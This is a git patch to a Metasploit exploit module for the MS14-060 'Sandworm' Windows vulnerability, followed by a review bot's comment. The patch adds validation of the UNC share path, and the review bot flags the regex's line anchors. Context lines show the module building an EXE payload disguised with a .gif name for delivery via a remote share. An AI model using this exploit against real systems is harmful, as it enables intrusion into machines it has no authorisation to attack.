From 8fa648744c41a86d4c37b872a74e40f799ac99c6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 17 Oct 2014 13:46:13 -0500
Subject: [PATCH] Add @wchen-r7's unc regex
---
 .../windows/fileformat/ms14_060_sandworm.rb | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
index 9b04d52917..cb5313d3e9 100644
--- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
+++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
@@ -81,7 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def exploit
- @unc = datastore['UNCPATH']
+ @unc = validate_unc_path
+
+ if @unc.nil?
+ fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
+ end
 print_status("Creating the EXE payload...")
 payload_name = "#{rand_text_alpha(4)}.gif"
@@ -104,6 +108,16 @@ class Metasploit3 < Msf::Exploit::Remote
 print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
 end
+ def validate_unc_path
+ if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/
+ unc = datastore['UNCPATH']
+ else
+ unc = nil
+ end
+
+ unc
+ end
+
 def my_file_create(data, name)
 ltype = "exploit.fileformat.#{self.shortname}"
 path = store_local(ltype, nil, data, name)
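Review bot: The pattern in `validate_unc_path` is anchored with `^` and `$`, which in Ruby match at line boundaries, so a multi-line UNCPATH value is accepted whenever any single line of it looks like `\\host\share`, and the whole string is then returned and used by `exploit`. Anchoring with `\A` and `\z` checks the entire value: `datastore['UNCPATH'] =~ /\A\\{2}[[:print:]]+\\[[:print:]]+\\*\z/`. The if/else that assigns `unc` and then returns it could also collapse to one expression, `datastore['UNCPATH'] if datastore['UNCPATH'] =~ ...`. A one-line comment stating the accepted form (two leading backslashes, host, one backslash, share, optional trailing backslashes) would help the next reader.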